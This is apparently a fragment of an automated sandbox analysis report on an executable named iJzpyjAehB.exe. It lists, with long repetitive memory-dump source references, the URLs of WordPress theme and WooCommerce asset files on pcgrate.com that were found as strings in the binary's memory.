                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
